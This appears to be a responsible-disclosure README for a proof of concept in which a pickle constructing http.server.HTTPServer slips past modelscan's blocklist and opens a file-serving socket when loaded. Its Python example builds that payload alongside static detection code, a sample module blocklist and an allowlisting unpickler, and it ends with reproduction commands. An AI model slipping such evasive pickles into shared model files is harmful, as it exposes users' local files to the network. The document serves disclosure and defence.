---
library_name: pytorch
tags:
  - security-research
  - modelscan-bypass
license: mit
---

ModelScan Bypass PoC — http.server.HTTPServer

Security research for responsible disclosure via the Huntr MFV program.

Vulnerability

http.server.HTTPServer is not in modelscan's unsafe_globals blocklist. modelscan reports "No issues found", but unpickling the file constructs an HTTPServer, which binds a listening socket during deserialization. With a file-serving request handler, that server hands out local files (the directory it is pointed at, the working directory by default) to anything that can reach the port.

Impact: CRITICAL

The blocklist is keyed on module names. http is not on it (only the Python 2 name httplib is), so a global of http.server.HTTPServer passes the check. The constructor does the damage: HTTPServer inherits from socketserver.TCPServer, whose __init__ calls server_bind() and server_activate() by default, so merely building the object binds the port and starts listening. socket is used internally, but the pickle never references socket directly, so the blocked socket entry is never matched.
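How the bypass works and how to catch it, as an added example that is not part of this repository's PoC or of modelscan: it builds a pickle whose only globals are http.server.HTTPServer and http.server.SimpleHTTPRequestHandler, lists the globals a pickle references without loading it (covering both GLOBAL and STACK_GLOBAL, including memo references), and runs that list through a constructed module blocklist modelled on the kind of list described above (not modelscan's real configuration) and through an allowlist of expected model-format modules. It closes with an allowlisting Unpickler, the runtime version of the same check. BLOCKLIST_MODULES and ALLOWLIST_MODULES are illustrative sets chosen for this example, not settings taken from any real tool.

```python
import io
import pickle
import pickletools
from http.server import HTTPServer, SimpleHTTPRequestHandler

# Constructed stand-ins for the two policy styles. Neither is modelscan's real
# configuration; the blocklist only mirrors the kind of module names it keys on.
BLOCKLIST_MODULES = {"builtins", "os", "posix", "nt", "sys", "subprocess", "socket", "httplib"}
ALLOWLIST_MODULES = {"collections", "torch", "torch._utils", "numpy", "numpy.core.multiarray"}

_STR_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
_PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}
_GET_OPS = {"GET", "BINGET", "LONG_BINGET"}


class _HTTPServerPayload:
    """Pickles to REDUCE(HTTPServer, (addr, handler)): no socket/os/subprocess global."""

    def __reduce__(self):
        # socketserver.TCPServer.__init__ calls server_bind()/server_activate()
        # by default, so the constructor alone binds and listens. Port 0 is ephemeral.
        return (HTTPServer, (("127.0.0.1", 0), SimpleHTTPRequestHandler))


def build_payload(protocol=4):
    """Serialize the payload without loading it. fix_imports=False keeps Python 3
    module names for protocol < 3 instead of the Python 2 compatibility names."""
    return pickle.dumps(_HTTPServerPayload(), protocol=protocol, fix_imports=False)


def referenced_globals(data):
    """Statically list every (module, name) the pickle would import.

    Handles GLOBAL (module and name inline) and STACK_GLOBAL (module and name
    taken from the stack, possibly via memo references) by replaying only the
    parts of the pickle VM that move strings around. Nothing is executed."""
    stack, memo, found = [], {}, []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
            stack.append(None)
        elif op.name == "STACK_GLOBAL":
            name, module = stack.pop(), stack.pop()
            found.append((module, name))
            stack.append(None)
        elif op.name in _STR_OPS:
            stack.append(arg)
        elif op.name == "MEMOIZE":
            memo[len(memo)] = stack[-1]
        elif op.name in _PUT_OPS:
            memo[arg] = stack[-1]
        elif op.name in _GET_OPS:
            stack.append(memo[arg])
        elif op.name == "MARK":
            stack.append(pickletools.markobject)
        else:
            # Any other opcode: consume its operands, push placeholders for results.
            before = op.stack_before
            if any(x is pickletools.markobject for x in before):
                while stack.pop() is not pickletools.markobject:
                    pass  # everything back to the MARK, e.g. tuple/list items
                below = next(i for i, x in enumerate(before) if x is pickletools.markobject)
                del stack[len(stack) - below:]  # operands under the MARK (SETITEMS' dict)
            else:
                del stack[len(stack) - len(before):]
            stack.extend([None] * len(op.stack_after))
    return found


def flagged_by_blocklist(found):
    """Blocklist: a global is bad only if its module is named. http.server is not."""
    return [g for g in found if g[0] in BLOCKLIST_MODULES]


def flagged_by_allowlist(found):
    """Allowlist: anything outside the expected model-format modules is flagged."""
    return [g for g in found if g[0] not in ALLOWLIST_MODULES]


class _RestrictedUnpickler(pickle.Unpickler):
    """Runtime counterpart: find_class runs before REDUCE, so the constructor never fires."""

    def find_class(self, module, name):
        if module in ALLOWLIST_MODULES:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def rejected_by_restricted_loader(data):
    """True if the allowlisting unpickler refuses the pickle before executing it."""
    try:
        _RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    found = referenced_globals(build_payload())
    print(found, flagged_by_blocklist(found), flagged_by_allowlist(found))
```

The payload is never passed to plain pickle.loads here, because constructing HTTPServer binds a listening socket. The allowlist is the policy that survives this class of bypass: any module not needed to rebuild a model is suspicious, rather than only the modules someone has already thought to list. One further caveat for scanners: for protocols below 3 the Unpickler, with its default fix_imports=True, maps Python 2 module names onto Python 3 ones at load time, so a file can name BaseHTTPServer and still import http.server; a blocklist has to check both spellings.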

Reproduction

pip install modelscan
modelscan scan -p bypass_poc.pkl
# Output: "No issues found!"